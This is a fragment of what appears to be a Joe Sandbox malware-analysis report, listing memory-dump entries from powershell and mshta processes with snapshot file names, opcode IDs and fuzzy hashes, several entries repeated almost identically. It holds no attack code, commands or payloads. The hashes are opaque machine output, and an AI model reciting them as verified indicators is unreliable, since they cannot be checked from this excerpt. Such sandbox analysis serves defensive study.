                                  • Source File: 00000004.00000002.2349616372.00007FF848650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848650000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848650000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50a265efbff165e9494a9a7d6740091d4d4012cd19623dbda27a304ab0e77661
                                  • Instruction ID: bf9f79226681f7a1aa5f5f8c3810a63f49f331769af2ff52573c1dafad02a3d3
                                  • Opcode Fuzzy Hash: 50a265efbff165e9494a9a7d6740091d4d4012cd19623dbda27a304ab0e77661
                                  • Instruction Fuzzy Hash: 7B01677111CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661DB36E882CB45

                                  Executed Functions

                                  Function 000001BDC3CD0FA1 Relevance: .0, Instructions: 5COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3568124866.000001BDC3CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001BDC3CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1bdc3cd0000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction ID: 7638cade43da6f3a7eb88bc1387a26807ab0a7c224c3c2c58bd627c3b98bc6b1
                                  • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction Fuzzy Hash: B490021849541655D51811961D852DC6440A388260FE44484941694145EA6D03969162
                                  Function 000001BDC3CD0FB9 Relevance: .0, Instructions: 5COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3568124866.000001BDC3CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001BDC3CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1bdc3cd0000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction ID: 7638cade43da6f3a7eb88bc1387a26807ab0a7c224c3c2c58bd627c3b98bc6b1
                                  • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction Fuzzy Hash: B490021849541655D51811961D852DC6440A388260FE44484941694145EA6D03969162
                                  Function 000001BDC3CD0FB1 Relevance: .0, Instructions: 5COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3568124866.000001BDC3CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001BDC3CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1bdc3cd0000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction ID: 7638cade43da6f3a7eb88bc1387a26807ab0a7c224c3c2c58bd627c3b98bc6b1
                                  • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction Fuzzy Hash: B490021849541655D51811961D852DC6440A388260FE44484941694145EA6D03969162
                                  Function 000001BDC3CD0FC1 Relevance: .0, Instructions: 5COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3568124866.000001BDC3CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001BDC3CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_1bdc3cd0000_mshta.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction ID: 7638cade43da6f3a7eb88bc1387a26807ab0a7c224c3c2c58bd627c3b98bc6b1
                                  • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                  • Instruction Fuzzy Hash: B490021849541655D51811961D852DC6440A388260FE44484941694145EA6D03969162